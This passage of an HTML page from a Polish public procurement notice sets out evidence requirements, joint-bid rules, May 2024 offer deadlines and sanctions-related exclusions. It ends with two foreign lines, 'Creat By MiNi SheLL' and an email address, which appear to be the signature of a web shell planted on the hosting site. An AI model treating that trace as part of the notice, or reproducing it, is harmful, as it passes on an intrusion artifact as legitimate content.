<h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a)	wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz, których usługi zostały wykonane, o treści odpowiadającej załącznikowi nr 4 do SWZ, oraz dowody określające czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. <br/>Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania<br/>o udzielenie zamówienia, Zamawiający może na każdym etapie postępowania wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli wymagał ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień ich złożenia.<br/>3.	Jeżeli zachodzą uzasadnione podstawy do uznania, że złożone uprzednio podmiotowe środki dowodowe nie są już aktualne, Zamawiający może w każdym czasie wezwać Wykonawcę lub Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, aktualnych na dzień ich złożenia.<br/>4.	Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał<br/>w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków. <br/>5.	Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność. <br/>6.	Podmiotowe środki dowodowe sporządzone w języku obcym muszą być złożone wraz z tłumaczeniem na język polski. <br/>7.	Podmiotowe środki dowodowe oraz inne dokumenty lub oświadczenia należy przekazać Zamawiającemu przy użyciu komunikacji elektronicznej, w zakresie i w sposób określony w Rozporządzeniu Prezesa Rady Ministrów z dnia 30 grudnia 2020r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie (Dz. U. z 2020 r. poz. 2452).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawca dołącza do oferty oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu– załącznik nr 2 i 3 do SWZ. <br/>2)	Oświadczenie składane jest pod rygorem nieważności w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. <br/>3)	Oświadczenie składają odrębnie: <br/>-	wykonawca/każdy spośród wykonawców wspólnie ubiegających się o udzielenie zamówienia. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia wykonawcy oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu; <br/>4) W przypadku wykonawców ubiegających się wspólnie o udzielenie zamówienia wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z którego treści będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych wykonawców należy załączyć do oferty. <br/>Pełnomocnictwo powinno być załączone do oferty i powinno zawierać w szczególności wskazanie: <br/>-	postępowania o zamówienie publiczne, którego dotyczy, <br/>-	wszystkich wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby, <br/>-	ustanowionego pełnomocnika oraz zakresu jego umocowania. <br/>Wymagana forma: <br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym. <br/>Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym osoby posiadającej uprawnienia notariusza. <br/>5) Oświadczenie wykonawców wspólnie ubiegających się o udzielenie zamówienia <br/>•	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, spośród których tylko jeden spełnia warunek dotyczący uprawnień, są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/>•	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. W takiej sytuacji wykonawcy są zobowiązani dołączyć do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni wykonawcy. <br/>Wymagana forma: <br/>Wykonawcy składają oświadczenia w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym, lub podpisem osobistym osoby upoważnionej do reprezentowania wykonawców zgodnie z formą reprezentacji określoną w dokumencie rejestrowym właściwym dla formy organizacyjnej lub innym dokumencie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Oprócz zmian dopuszczalnych ustawą Pzp (art. 455 ustawy Pzp) Zamawiający przewiduje zmiany wskazane w &amp; 16 wzoru umowy (załącznik nr 6 do SWZ). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-05-23 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/gorakalwaria</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-05-23 09:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-06-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Z postępowania o udzielenie zamówienia, stosownie do art. 7 ust. 1 pkt 1-3 ustawy z dnia 13 kwietnia 2022r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. poz. 835), wyklucza się:<br/>1)	Wykonawcę wymienionego w wykazach określonych w rozporządzeniu Rady (WE) nr 765/2006 z dnia 18 maja 2006 r. dotyczącego środków ograniczających w związku z sytuacją na Białorusi i udziałem Białorusi w agresji Rosji wobec Ukrainy (Dz.Urz. UE L 134 z 20.05.2006, str. 1, z późn. zm.), zwanego dalej ,,rozporządzeniem 765/2006” i rozporządzeniu Rady (UE) nr 269/2014 z dnia 17 marca 2014 r. w sprawie środków ograniczających w odniesieniu do działań podważających integralność terytorialną, suwerenność i niezależność Ukrainy lub im zagrażających (Dz.Urz. UE L 78 z 17.03.2014, str. 6, z późn. zm.), zwanego dalej ,,rozporządzeniem 269/2014&#39;&#39; albo wpisanego na listę osób i podmiotów, wobec których są stosowane środki, o których mowa w art. 1 ustawy wymienionej w ust.2, zwaną dalej „listą” na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>2)	Wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu Rady 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy;<br/>3)	Wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106), jest podmiot wymieniony w wykazach określonych w rozporządzeniu i rozporządzeniu nr 269//2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ww. ustawy.

Creat By MiNi SheLL
Email: jattceo@gmail.com